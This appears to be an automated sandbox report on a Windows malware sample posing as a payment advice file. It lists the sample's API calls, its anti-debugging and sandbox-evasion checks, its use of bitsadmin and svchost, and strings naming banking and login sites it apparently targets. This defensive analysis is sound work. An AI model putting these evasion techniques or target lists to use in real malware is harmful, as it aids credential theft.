                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_005648D7
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_005E5376
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00583187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00583187
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Latest advice payment.exe | API/Special instruction interceptor: Address: 10A55D4
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\bitsadmin.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: Latest advice payment.exe, 00000000.00000002.2152825463.0000000001218000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE,
                Source: Latest advice payment.exe, 00000000.00000002.2152825463.0000000001218000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXES
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Users\user\Desktop\Latest advice payment.exe | API coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 420 | Thread sleep count: 43 > 30
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 420 | Thread sleep time: -86000s >= -30000s
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe TID: 7288 | Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe TID: 7288 | Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_005C445A
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CC6D1 FindFirstFileW,FindClose, 0_2_005CC6D1
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_005CC75C
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_005CEF95
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_005CF0F2
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_005CF3F3
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_005C37EF
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_005C3B12
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_005CBCBC
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_005649A0
                Source: z5f52P3-.8.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: CWtKbasqHVKAO.exe, 0000000C.00000002.3990926739.00000000012FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                Source: z5f52P3-.8.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: z5f52P3-.8.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: z5f52P3-.8.dr | Binary or memory string: discord.comVMware20,11696487552f
                Source: z5f52P3-.8.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: z5f52P3-.8.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: z5f52P3-.8.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: z5f52P3-.8.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: z5f52P3-.8.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: z5f52P3-.8.dr | Binary or memory string: global block list test formVMware20,11696487552
                Source: z5f52P3-.8.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: z5f52P3-.8.dr | Binary or memory string: AMC password management pageVMware20,11696487552
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2733701787.000001F34964C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.8.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: z5f52P3-.8.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: z5f52P3-.8.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: z5f52P3-.8.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: z5f52P3-.8.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: z5f52P3-.8.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: z5f52P3-.8.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: z5f52P3-.8.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: z5f52P3-.8.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: z5f52P3-.8.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: z5f52P3-.8.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: z5f52P3-.8.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: z5f52P3-.8.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: z5f52P3-.8.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: z5f52P3-.8.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: z5f52P3-.8.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: z5f52P3-.8.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: z5f52P3-.8.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: z5f52P3-.8.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417B23 LdrLoadDll, 2_2_00417B23
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005D3F09 BlockInput, 0_2_005D3F09
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00563B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00563B3A
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00595A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00595A7C
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00564B37 LoadLibraryA,GetProcAddress, 0_2_00564B37
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_010A41F0 mov eax, dword ptr fs:[00000030h] 0_2_010A41F0
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_010A5840 mov eax, dword ptr fs:[00000030h] 0_2_010A5840
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_010A58A0 mov eax, dword ptr fs:[00000030h] 0_2_010A58A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h] 2_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h] 2_2_034D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h] 2_2_0350634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h] 2_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h] 2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h] 2_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h] 2_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h] 2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h] 2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h] 2_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h] 2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h] 2_2_034B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h] 2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
